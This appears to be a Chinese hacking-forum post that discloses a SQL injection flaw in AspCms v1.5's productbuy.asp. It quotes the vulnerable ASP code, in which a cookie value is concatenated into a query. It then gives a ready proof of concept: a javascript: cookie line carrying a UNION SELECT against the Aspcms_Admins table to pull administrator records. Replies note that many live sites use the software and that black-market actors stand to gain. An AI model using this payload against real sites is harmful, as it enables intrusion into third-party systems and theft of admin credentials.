AspCms_v1.5_20110517 SQL注射
好久没上土司了,上来一看发现在删号名单内.....
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说,看代码:漏洞很明显,没啥好说的
poc:另外,脚本板块没权限发帖子
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说,看代码:
<%
if action = "buy" then
addOrder()
else
echoContent()
end if
……略过
Sub echoContent()
dim id
id=getForm("id","get")
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
Dim templatePath,tempStr
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
selectproduct=rsObj(0)
Dim linkman,gender,phone,mobile,email,qq,address,postcode
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
if rCookie("loginstatus")=1 then
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
linkman=rsObj("truename")
gender=rsObj("gender")
phone=rsObj("phone")
mobile=rsObj("mobile")
email=rsObj("email")
qq=rsObj("qq")
address=rsObj("address")
postcode=rsObj("postcode")
else
gender=1
end if
rsObj.close()
with templateObj
.content=loadFile(templatePath)
.parseHtml()
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
.content=replaceStr(.content,"[aspcms:gender]",gender)
.content=replaceStr(.content,"[aspcms:phone]",phone)
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
.content=replaceStr(.content,"[aspcms:email]",email)
.content=replaceStr(.content,"[aspcms:qq]",qq)
.content=replaceStr(.content,"[aspcms:address]",address)
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
.parseCommon()
echo .content
end with
set templateobj =nothing : terminateAllObjects
End Sub
poc:
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));
评论22次
谢谢楼主分享
旁注的时候应该很给力
此CMS好像很多站在使用,虽然年前的,肯定一堆站在悲剧
好东西 用这程序的还是挺多的
rcookie函数没过滤吗? 能带点注释就好多了
谢谢分享!!
楼主金币xi引人啊
表示用这个程序的站很多,只是版权被马克了,搞黑产的有福了
漏洞很明显,没啥好说的
高帅富!! 绝对的
表示LZ钱真的很多。。
楼主money好给力。。。
Cookie注入哦
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1") cookie注入伤不起啊... 估计是发布了最新版就没补这个洞了
楼主高富帅- -
木有cookie欺骗的那个给力。。。直接后台。
好有钱
支持一下~~~~~~
楼主好有钱啊。。
我看来楼主金币的